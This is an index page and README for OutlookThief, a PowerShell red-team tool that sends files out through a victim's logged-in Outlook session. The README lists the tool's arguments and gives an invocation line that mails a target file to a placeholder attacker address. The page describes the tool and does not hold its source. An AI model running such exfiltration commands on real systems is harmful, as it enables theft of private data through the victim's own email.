Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/zeyad-azima/outlookthief
A tool to abuse the current opened session of outlook to exfilitrate data through it.
https://github.com/zeyad-azima/outlookthief
cybersecurity exfiltration hacking outlook phishing redteam redteaming
Last synced: 4 days ago
JSON representation
A tool to abuse the current opened session of outlook to exfilitrate data through it.
- Host: GitHub
- URL: https://github.com/zeyad-azima/outlookthief
- Owner: Zeyad-Azima
- Created: 2023-02-25T10:38:04.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-09-04T11:17:18.000Z (over 1 year ago)
- Last Synced: 2023-09-05T00:59:08.877Z (over 1 year ago)
- Topics: cybersecurity, exfiltration, hacking, outlook, phishing, redteam, redteaming
- Language: PowerShell
- Homepage:
- Size: 3.91 KB
- Stars: 3
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# OutlookThief
![image psd](https://github.com/Zeyad-Azima/OutlookThief/assets/62406753/fd9fd1af-6d06-43e3-8f20-37750866b3b3)
A tool to abuse the current opened session of outlook to exfilitrate data through it.
# Usage
```
[+] OutlookThief
[*] By: Zeyad Azima
[*] Github: https://github.com/Zeyad-Azima/OutlookThief[*] Help:
The tool simply abuses the logged-in user through outlook to send email that has the targeted data to Exfiltrate it to the attacker side.[*] Arguments:
-help : Display the help message
-mailTo : The attacker/recipient email
-attachmentPath : The file path to exfiltrate
-subject : The email Subject
-bodyContent : The email body content
```
### Invoke
```
.\OutlookThief.ps1 -mailTo "attacker_mail" -attachmentPath "file_path" -subject "Subject" -bodyContent "Body Content"
```